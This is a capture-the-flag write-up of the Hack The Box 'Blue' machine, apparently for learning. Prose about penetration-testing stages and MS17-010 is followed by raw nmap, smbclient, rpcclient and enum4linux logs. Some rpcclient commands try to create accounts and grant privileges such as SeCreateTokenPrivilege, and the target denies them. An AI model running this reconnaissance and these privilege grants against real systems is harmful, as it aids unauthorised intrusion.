Now, instead of typing target IP, we can use blue.htb, it's more comfortable.
Now, let's connect to the VPN, so that we would be able to access the machine on the network:
We can see that we have a successful connection:
To get out of the shell click Ctrl+Z and you wil see that job is stopped.
Let's:
List the running jobs
Move VPN job to background
Check that the job is running
Check that we have a working VPN connection and that we can hit the target machine
-c 2 stands for send 2 packets, so we sent 2 packet and we received 2 packets.
Stage 1: Enumeration
First thing first, let's enumerate our target and find as much of information as possible.
Before any target systems can be examined and attacked, they must first be identified. This process is often called enumeration. Here a penetration tester will enumerate the customer, application, or system they are testing. The common things we are hunting during this early stage include anything from open ports, login credentials, DNS records, protocols on our target, and even publicly available information.
Let's give it a time to run, while it runs, I'll explain command that we are using:
nmap - is a free and open source utility for network discovery and security auditing that we are using to enumerate target. Documentation
-sC - Scan with default NSE scripts. Considered useful for discovery
-sV - Attempts to determine the version of the service running on port
-p- - Port scan all ports
-oN - Normal output to the file normal.fileCopied
nmap_results.txt - file name where scan result will be saved
blue.htb - remember us editing hosts file?
Now we know that we can enumerate more in to SMB and that it's an Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) that we can search some exploits available.
We have 5 SMB shares. Let's enumerate them too.
Windows keep a backup of all the activities and changes such as accessing folders, opening files, network shares, etc., in netuser.dat.LOG1 and netuser.dat.LOG2 during the live session and saves them into NTUSER.DAT during Log off. The NTUSER.DAT is the primary file for the HKEY_CURRENT_USER hive and keeps user-related information; however, Windows is not updating this file in real-time.
And this could be a rabbit hole as well.
What are the options?
Didn't find anything interesting so far:
This is really better and faster than going manually. As well as we can see what permissions we would have in the directories and what we can try to do with the files and can we make an upload anywhere.
I think I've pushed max I could with smbclient and smbmap, time to dig with rpcclient:
And let's have a look in to some SANS cheat sheet here
I will share here only if I get any data out of enumerating RPC:
Total of 3 users. There was a Forced Logging off on the Server.
Didn't get anything about users and groups. But we know we have Haris, Administrator.
It should be possible to extract details about a particular group, and we should have groups but I don't get output. This information includes the Group Name, Description, Attributes, and the number of members in that group. Let's try:
Now, I will try random guessing:
hah :D
We have 34 privileges assigned.
To enumerate the Password Properties on the domain, the
command can be used. This is made from the words get domain password information. This will help in getting the information such as the kind of password policies that have been enforced by the Administrator in the domain. It is possible to enumerate the minimum password length and the enforcement of complex password rules. If these kinds of features are not enabled on the domain, then it is possible to brute force the credentials on the domain.
It is also possible to get the password properties of individual users. I will try to do random guess again.
We have "access denied" meaning that someone is 0x1f4. #0x1f4
The SID of a user is the security Identifier that can be used for a lot of elevating privileges and minting tickets attacks.
No output for these and because of that we cant enumerate further with, as example:
Can we create domain group?
Since the user and password-related information is stored inside the SAM file of the Server. It is possible to enumerate the SAM data through the rpcclient as well. When provided with the username to the samlookupnames command, it can extract the RID of that particular user. If used the RID is the parameter, the samlookuprids command can extract the username relevant to that particular RID.
The one that I got Access restriction before if you remember.
We can search backwards too.
Passing the SID as a parameter in the lsacreateaccount command will enable me to create an account object as shown in the image below.
It is possible to perform enumeration regarding the privileges for a group or a user based on their SID as well.
Can I manipulate the privileges any SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether?
No sense in deleting if can't add then.
Enumerate the security objects or permissions and privileges related to the security.
Let's google about MS17-010 since nmap says that it's vulnerable. And I want to do as much manual or semi-manual as I can because doing this in Metasploit is easy and won't teach me anything.
Just imagine what NSA and other Intelligence Services have now in their usage...
The vulnerability assessment builds on information gathered during enumeration. We’re probing for known vulnerabilities in the system or application; and will then test them with specialized tools and techniques to determine if there is indeed a method of exploitation.
Let's do the same for hands-on experience with Metasploit.
I think we are ready to attempt exploit semi-manully and automatically. Unfortunatelly I do not have required knowledge to understand in-depth how it works under the hood, but this is exactly what I wish to achieve. As a state of art develop a skill of creating same level personal exploits and tools crafted in tailored manner.
Stage 3: Exploitation
Targeting the vulnerabilities identified in the previous step, an attack is crafted and executed. This could be anything from a crafted piece of code or malicious file used to exploit an OS or application vulnerability, to showing that file upload and execution capabilities exist within a web app.
Now back to Metasploit.
Now back to Enumeration, which make no sense, but:
Stage 4: Post-exploitation
The post-exploitation phase is about diving deeper. An attacker will attempt to gather more information, elevate access (or privileges), and ensure they have a way to get back in if they lose access (this is called persistence). We’ll also revisit the information-gathering tasks performed earlier since we now have internal access.
We have highest privilege achieved with this exploit.
And etc. with these one's John and Hashcat can deal.
Stage 5: Lateral movement
Signaling the end of the engagement, lateral movement focuses on moving closer to valuable assets. The goal is to “follow the trail” and extend access to other hosts and applications. Now that we have a solid access point (or foothold) within the customer’s network, it's time spread out and survey the environment to pursue highly-protected, precious intellectual property (IP), sensitive resources, or access to a host.
In this case we have only 1 machine at the network and there is no valuable data to exfiltrate.
Stage 6: POC
The proof of concept phase is where specific vulnerabilities and security flaws are noted for reporting purposes. We are crafting the narrative that explains to customers how we gained access to their systems and how highlighted issues affect their security posture. This phase is key to tying everything together and ensures that the customer receives useful insights.
Starting Nmap 7.92 ( https://nmap.org ) at 2023-10-09 18:32 EDT
Verbosity Increased to 1.
Verbosity Increased to 2.
Increasing send delay for 10.129.123.117 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.123.117 from 5 to 10 due to 11 out of 27 dropped probes since last increase.
Connect Scan Timing: About 22.20% done; ETC: 18:35 (0:01:49 remaining)
Discovered open port 49152/tcp on 10.129.123.117
Connect Scan Timing: About 26.32% done; ETC: 18:36 (0:02:51 remaining)
Discovered open port 49154/tcp on 10.129.123.117
Connect Scan Timing: About 30.49% done; ETC: 18:37 (0:03:27 remaining)
Increasing send delay for 10.129.123.117 from 10 to 20 due to max_successful_tryno increase to 5
Connect Scan Timing: About 32.85% done; ETC: 18:38 (0:04:07 remaining)
Connect Scan Timing: About 34.95% done; ETC: 18:39 (0:04:41 remaining)
Connect Scan Timing: About 37.10% done; ETC: 18:40 (0:05:07 remaining)
Connect Scan Timing: About 39.79% done; ETC: 18:41 (0:05:33 remaining)
Connect Scan Timing: About 46.69% done; ETC: 18:44 (0:06:01 remaining)
Discovered open port 49157/tcp on 10.129.123.117
Discovered open port 49156/tcp on 10.129.123.117
Discovered open port 49155/tcp on 10.129.123.117
Connect Scan Timing: About 62.00% done; ETC: 18:47 (0:05:26 remaining)
Connect Scan Timing: About 69.11% done; ETC: 18:47 (0:04:42 remaining)
Discovered open port 49153/tcp on 10.129.123.117
Connect Scan Timing: About 75.32% done; ETC: 18:48 (0:03:55 remaining)
Connect Scan Timing: About 81.05% done; ETC: 18:49 (0:03:07 remaining)
Connect Scan Timing: About 86.58% done; ETC: 18:49 (0:02:16 remaining)
Connect Scan Timing: About 91.75% done; ETC: 18:49 (0:01:25 remaining)
Connect Scan Timing: About 96.92% done; ETC: 18:50 (0:00:32 remaining)
Completed Connect Scan at 18:50, 1066.04s elapsed (65535 total ports)
Initiating Service scan at 18:50
Scanning 9 services on blue.htb (10.129.123.117)
Service scan Timing: About 44.44% done; ETC: 18:52 (0:01:09 remaining)
Completed Service scan at 18:51, 59.72s elapsed (9 services on 1 host)
NSE: Script scanning 10.129.123.117.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 9.92s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
Nmap scan report for blue.htb (10.129.123.117)
Host is up (0.054s latency).
Scanned at 2023-10-09 18:32:43 EDT for 1136s
Not shown: 65526 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-09T22:51:32
|_ start_date: 2023-10-09T21:53:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 53802/tcp): CLEAN (Couldn't connect)
| Check 2 (port 53040/tcp): CLEAN (Couldn't connect)
| Check 3 (port 62302/udp): CLEAN (Timeout)
| Check 4 (port 12505/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-10-09T23:51:34+01:00
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:51
Completed NSE at 18:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1136.41 seconds
smbclient -L \\\\blue.htb\\
smbclient //blue.htb/ADMIN$
smbclient //blue.htb/C$
smbclient //blue.htb/IPC$
smbclient //blue.htb/Share
smbclient //blue.htb/Users
mget NTUSER.DAT
ls AppData\
ls AppData\Loal
ls AppData\Local
ls AppData\Roaming
ls AppData\Roaming\
ls AppData\Roaming\Media Center Programs\
ls AppData\Roaming\Microsoft\
ls AppData\Roaming\Microsoft\Windows\
ls AppData\Roaming\Microsoft\Windows\Cookies\
ls AppData\Roaming\Microsoft\Windows\Network Shortcuts\
ls AppData\Roaming\Microsoft\Windows\Network \\Shortcuts\
ls AppData\Roaming\Microsoft\Windows\"Network Shortcuts"\
ls AppData\Roaming\Microsoft\Windows\Recent\
ls AppData\Roaming\Microsoft\Windows\SendTo\
ls AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget
44: mget AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget
45: mget AppData\Roaming\Microsoft\Windows\SendTo\"Compressed (zipped) Folder.ZFSendToTarget"
46: ls AppData\Roaming\Microsoft\Windows\SendTo\"Compressed (zipped) Folder.ZFSendToTarget"
47: ls AppData\Roaming\Microsoft\Windows\SendTo\"Fax Recipient.lnk"
48: mget AppData\Roaming\Microsoft\Windows\SendTo\"Fax Recipient.lnk"
49: mget AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail
50: mget AppData\Roaming\Microsoft\Windows\SendTo\"Mail Recipient.MAPIMail"
51: mget AppData\Roaming\Microsoft\Windows\SendTo\'Mail Recipient.MAPIMail'
52: mget AppData\Roaming\Microsoft\Windows\
53: ls AppData\Roaming\Microsoft\Windows\
54: ls AppData\Roaming\Microsoft\Windows\Templates\
55: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\
56: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\
57: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\
58: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\Accessibility\
59: mget AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\Accessibility\
60: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\Accessibility\
61: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\
62: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\"System Tools"\
63: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\Accessories\
64: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\Programs\
65: ls AppData\Roaming\Microsoft\Windows\"Start Menu"\
66: ls AppData\Roaming\Microsoft\Windows\
67: ls AppData\Roaming\Microsoft\Windows\"Network Shortcuts"\
68: ls AppData\Roaming\Microsoft\Windows\
69: ls AppData\Roaming\Microsoft\
70: ls AppData\Roaming\Microsoft\"Internet Explorer"\
71: ls AppData\Roaming\Microsoft\"Internet Explorer"\"Quick Launch"\
72: ls AppData\Roaming\Microsoft\
73: ls AppData\Roaming\
74: ls AppData\Roaming\"Media Center Programs"\
75: ls AppData\
rpcclient $> netshareenum
result was WERR_ACCESS_DENIED
rpcclient $> netshareenumall
result was WERR_ACCESS_DENIED
rpcclient $> netsharegetinfo
Usage: netsharegetinfo sharename [infolevel 1|2|502|1005]
rpcclient $> netsharegetinfo *
result was WERR_ACCESS_DENIED
rpcclient $> lsaquery
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
rpcclient $> dsroledominfo
Machine Role = [0]
Directory Service not running on server
rpcclient $> lookupnames Administrator
Administrator S-1-5-21-319597671-3711062392-2889596693-500 (User: 1)
rpcclient $> lsacreateaccount S-1-5-21-319597671-3711062392-2889596693-500
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lookupsids S-1-5-21-319597671-3711062392-2889596693-501
S-1-5-21-319597671-3711062392-2889596693-501 haris-PC\Guest (1)
rpcclient $> lsaenumacctrights
Usage: lsaenumacctrights SID
rpcclient $> lsaenumacctrights S-1-5-21-319597671-3711062392-2889596693-501
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-6
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-1-0
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-19
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-20
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-21-319597671-3711062392-2889596693-501
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-32-544
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-32-545
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-32-551
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-32-555
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-32-559
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-6
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaenumacctrights S-1-5-80-0
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lookupsids S-1-5-21-319597671-3711062392-2889596693-501
S-1-5-21-319597671-3711062392-2889596693-501 haris-PC\Guest (1)
rpcclient $> lsaaddpriv S-1-5-21-319597671-3711062392-2889596693-501 SeCreateTokenPrivilege
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaaddacctrights S-1-5-21-319597671-3711062392-2889596693-1000 SeCreateTokenPrivilege
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaaddacctrights S-1-5-21-319597671-3711062392-2889596693-501 SeCreateTokenPrivilege
result was NT_STATUS_CONNECTION_DISCONNECTED
rpcclient $> lsaenumprivsaccount S-1-5-21-319597671-3711062392-2889596693-1000
result was NT_STATUS_OBJECT_NAME_NOT_FOUND
rpcclient $> lsaenumprivsaccount S-1-5-21-319597671-3711062392-2889596693-501
result was NT_STATUS_ACCESS_DENIED
sudo apt install nfs-common
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package nfs-common is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package 'nfs-common' has no installation candidate
dpkg -l cifs-utils
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWai>
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name Version Architecture Description
+++-==============-============-============-======================>
un cifs-utils <none> <none> (no description availa>
sudo apt install cifs-utils
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package cifs-utils is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package 'cifs-utils' has no installation candidate
cat /etc/apt/sources.list.d/parrot.list
sudo apt install cifs-utils
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
coinor-libcbc3 coinor-libcgl1 coinor-libclp1 coinor-libcoinmp1v5 coinor-libcoinutils3v5 coinor-libosi1v5
espeak espeak-data ffmpegthumbnailer fonts-opensymbol fonts-symbola gimp gimp-data gir1.2-gstreamer-1.0
gstreamer1.0-gtk3 gtk2-engines-murrine hyphen-en-us libabsl20200923 libabw-0.1-1 libamd2 libao-common
libao4 libbabl-0.1-0 libboost-locale1.74.0 libbox2d2.3.0 libbrlapi0.8 libcamd2 libccolamd2 libcdr-0.1-1
libcholmod3 libclucene-contribs1v5 libclucene-core1v5 libcolamd2 libdotconf0 libe-book-0.1-1 libeot0
libepubgen-0.1-1 libespeak1 libetonyek-0.1-1 libexiv2-27 libexttextcat-2.0-0 libexttextcat-data
libffmpegthumbnailer4v5 libfreehand-0.1-1 libgegl-0.4-0 libgegl-common libgexiv2-2 libgimp2.0
liblangtag-common liblangtag1 liblouis-data liblouis20 libmetis5 libmng1 libmsgpackc2 libmspub-0.1-1
libmypaint-1.5-1 libmypaint-common libmythes-1.2-0 libnumbertext-1.0-0 libnumbertext-data
libodfgen-0.1-1 libpagemaker-0.0-0 libqxp-0.0-0 libraptor2-0 librasqal3 libraw20 librdf0
libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw
libreoffice-gtk3 libreoffice-impress libreoffice-math libreoffice-style-colibre libreoffice-writer
librevenge-0.0-0 libsonic0 libstaroffice-0.0-0 libsuitesparseconfig5 libtermkey1 libumfpack5
libunibilium4 libuno-cppu3 libuno-cppuhelpergcc3-3 libuno-purpenvhelpergcc3-3 libuno-sal3
libuno-salhelpergcc3-3 libvisio-0.1-1 libvterm0 libwpd-0.10-10 libwpg-0.3-3 libwps-0.4-4 libxmlsec1-nss
libyajl2 libzmf-0.0-0 lp-solve lua-luv mate-backgrounds mate-terminal-common mate-themes neovim-runtime
orca perl-tk python3-brlapi python3-louis python3-neovim python3-pyatspi python3-pynvim python3-speechd
python3-uno sound-icons speech-dispatcher speech-dispatcher-audio-plugins task-desktop uno-libs-private
ure xbrlapi xkbset
Use 'sudo apt autoremove' to remove them.
Suggested packages:
winbind
The following NEW packages will be installed:
cifs-utils
0 upgraded, 1 newly installed, 0 to remove and 538 not upgraded.
Need to get 90.4 kB of archives.
After this operation, 314 kB of additional disk space will be used.
Get:1 https://deb.parrot.sh/parrot parrot/main amd64 cifs-utils amd64 2:6.11-3.1+deb11u1 [90.4 kB]
Fetched 90.4 kB in 1s (168 kB/s)
Selecting previously unselected package cifs-utils.
(Reading database ... 492097 files and directories currently installed.)
Preparing to unpack .../cifs-utils_2%3a6.11-3.1+deb11u1_amd64.deb ...
Unpacking cifs-utils (2:6.11-3.1+deb11u1) ...
Setting up cifs-utils (2:6.11-3.1+deb11u1) ...
update-alternatives: using /usr/lib/x86_64-linux-gnu/cifs-utils/idmapwb.so to provide /etc/cifs-utils/idmap-
plugin (idmap-plugin) in auto mode
Processing triggers for man-db (2.10.1-1~bpo11+1) ...
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated
sudo apt install nfs-common
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
coinor-libcbc3 coinor-libcgl1 coinor-libclp1 coinor-libcoinmp1v5 coinor-libcoinutils3v5 coinor-libosi1v5
espeak espeak-data ffmpegthumbnailer fonts-opensymbol fonts-symbola gimp gimp-data gir1.2-gstreamer-1.0
gstreamer1.0-gtk3 gtk2-engines-murrine hyphen-en-us libabsl20200923 libabw-0.1-1 libamd2 libao-common
libao4 libbabl-0.1-0 libboost-locale1.74.0 libbox2d2.3.0 libbrlapi0.8 libcamd2 libccolamd2 libcdr-0.1-1
libcholmod3 libclucene-contribs1v5 libclucene-core1v5 libcolamd2 libdotconf0 libe-book-0.1-1 libeot0
libepubgen-0.1-1 libespeak1 libetonyek-0.1-1 libexiv2-27 libexttextcat-2.0-0 libexttextcat-data
libffmpegthumbnailer4v5 libfreehand-0.1-1 libgegl-0.4-0 libgegl-common libgexiv2-2 libgimp2.0
liblangtag-common liblangtag1 liblouis-data liblouis20 libmetis5 libmng1 libmsgpackc2 libmspub-0.1-1
libmypaint-1.5-1 libmypaint-common libmythes-1.2-0 libnumbertext-1.0-0 libnumbertext-data
libodfgen-0.1-1 libpagemaker-0.0-0 libqxp-0.0-0 libraptor2-0 librasqal3 libraw20 librdf0
libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw
libreoffice-gtk3 libreoffice-impress libreoffice-math libreoffice-style-colibre libreoffice-writer
librevenge-0.0-0 libsonic0 libstaroffice-0.0-0 libsuitesparseconfig5 libtermkey1 libumfpack5
libunibilium4 libuno-cppu3 libuno-cppuhelpergcc3-3 libuno-purpenvhelpergcc3-3 libuno-sal3
libuno-salhelpergcc3-3 libvisio-0.1-1 libvterm0 libwpd-0.10-10 libwpg-0.3-3 libwps-0.4-4 libxmlsec1-nss
libyajl2 libzmf-0.0-0 lp-solve lua-luv mate-backgrounds mate-terminal-common mate-themes neovim-runtime
orca perl-tk python3-brlapi python3-louis python3-neovim python3-pyatspi python3-pynvim python3-speechd
python3-uno sound-icons speech-dispatcher speech-dispatcher-audio-plugins task-desktop uno-libs-private
ure xbrlapi xkbset
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
libnfsidmap2 rpcbind
Suggested packages:
open-iscsi watchdog
The following NEW packages will be installed:
libnfsidmap2 nfs-common rpcbind
0 upgraded, 3 newly installed, 0 to remove and 538 not upgraded.
Need to get 316 kB of archives.
After this operation, 1,064 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 https://deb.parrot.sh/parrot parrot/main amd64 rpcbind amd64 1.2.5-9 [51.4 kB]
Get:2 https://deb.parrot.sh/parrot parrot/main amd64 libnfsidmap2 amd64 0.25-6 [32.6 kB]
Get:3 https://deb.parrot.sh/parrot parrot/main amd64 nfs-common amd64 1:1.3.4-6 [232 kB]
Fetched 316 kB in 1s (372 kB/s)
Selecting previously unselected package rpcbind.
(Reading database ... 492130 files and directories currently installed.)
Preparing to unpack .../rpcbind_1.2.5-9_amd64.deb ...
Unpacking rpcbind (1.2.5-9) ...
Selecting previously unselected package libnfsidmap2:amd64.
Preparing to unpack .../libnfsidmap2_0.25-6_amd64.deb ...
Unpacking libnfsidmap2:amd64 (0.25-6) ...
Selecting previously unselected package nfs-common.
Preparing to unpack .../nfs-common_1%3a1.3.4-6_amd64.deb ...
Unpacking nfs-common (1:1.3.4-6) ...
Setting up rpcbind (1.2.5-9) ...
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
update-rc.d: rpcbind is in our deadpool blacklist! YOU SHALL NOT PASS!
Created symlink /etc/systemd/system/sockets.target.wants/rpcbind.socket → /lib/systemd/system/rpcbind.socket
.
rpcbind.service is a disabled or a static unit, not starting it.
Setting up libnfsidmap2:amd64 (0.25-6) ...
Setting up nfs-common (1:1.3.4-6) ...
Creating config file /etc/idmapd.conf with new version
Adding system user `statd' (UID 135) ...
Adding new user `statd' (UID 135) with group `nogroup' ...
Not creating home directory `/var/lib/nfs'.
Created symlink /etc/systemd/system/multi-user.target.wants/nfs-client.target → /lib/systemd/system/nfs-clie
nt.target.
Created symlink /etc/systemd/system/remote-fs.target.wants/nfs-client.target → /lib/systemd/system/nfs-clien
t.target.
nfs-utils.service is a disabled or a static unit, not starting it.
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
update-rc.d: nfs-common is in our deadpool blacklist! YOU SHALL NOT PASS!
Processing triggers for man-db (2.10.1-1~bpo11+1) ...
Processing triggers for libc-bin (2.31-13+deb11u3) ...
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated
ls -lahtR > ~/Desktop/HTB/Machines/Retired/Windows/Easy/Blue/smbshare.txt
sudo umount -t cifs /mnt/admin
enum4linux -a -v blue.htb
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 10 14:18:25 2023
==========================
| Target Information |
==========================
Target ........... blue.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
================================================
| Enumerating Workgroup/Domain on blue.htb |
================================================
[V] Attempting to get domain name with command: nmblookup -A 'blue.htb'
[E] Can't find workgroup/domain
========================================
| Nbtstat Information for blue.htb |
========================================
Looking up status of 10.129.123.117
No reply from 10.129.123.117
=================================
| Session Check on blue.htb |
=================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[V] Attempting to make null session using command: smbclient -W '' //'blue.htb'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server blue.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:
=======================================
| Getting domain SID for blue.htb |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
[V] Attempting to get domain SID with command: rpcclient -W '' -U''%'' blue.htb -c 'lsaquery' 2>&1
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
==================================
| OS information on blue.htb |
==================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
[V] Attempting to get OS info with command: smbclient -W '' //'blue.htb'/ipc$ -U''%'' -c 'q' 2>&1
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for blue.htb from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[V] Attempting to get OS info with command: rpcclient -W '' -U''%'' -c 'srvinfo' 'blue.htb' 2>&1
[+] Got OS info for blue.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=========================
| Users on blue.htb |
=========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[V] Attempting to get userlist with command: rpcclient -W '' -c querydispinfo -U''%'' 'blue.htb' 2>&1
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[V] Attempting to get userlist with command: rpcclient -W '' -c enumdomusers -U''%'' 'blue.htb' 2>&1
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=====================================
| Share Enumeration on blue.htb |
=====================================
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on blue.htb
================================================
| Password Policy Information for blue.htb |
================================================
[V] Attempting to get Password Policy info with command: polenum '':''@'blue.htb' 2>&1
[E] Unexpected error from polenum:
[+] Attaching to blue.htb using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:BLUE.HTB)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[V] Attempting to get Password Policy info with command: rpcclient -W '' -U''%'' 'blue.htb' -c "getdompwinfo" 2>&1
[E] Failed to get password policy with rpcclient
==========================
| Groups on blue.htb |
==========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[V] Getting builtin groups with command: rpcclient -W '' -U''%'' 'blue.htb' -c 'enumalsgroups builtin' 2>&1
[+] Getting builtin groups:
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[V] Getting local groups with command: rpcclient -W '' -U''%'' 'blue.htb' -c 'enumalsgroups domain' 2>&1
[+] Getting local groups:
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[V] Getting domain groups with command: rpcclient -W '' -U''%'' 'blue.htb' -c "enumdomgroups" 2>&1
[+] Getting domain groups:
[+] Getting domain group memberships:
===================================================================
| Users on blue.htb via RID cycling (RIDS: 500-550,1000-1050) |
===================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[V] Attempting to get SID from blue.htb with command: rpcclient -W '' -U''%'' 'blue.htb' -c 'lookupnames administrator' 2>&1
[V] Assuming that user "administrator" exists
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
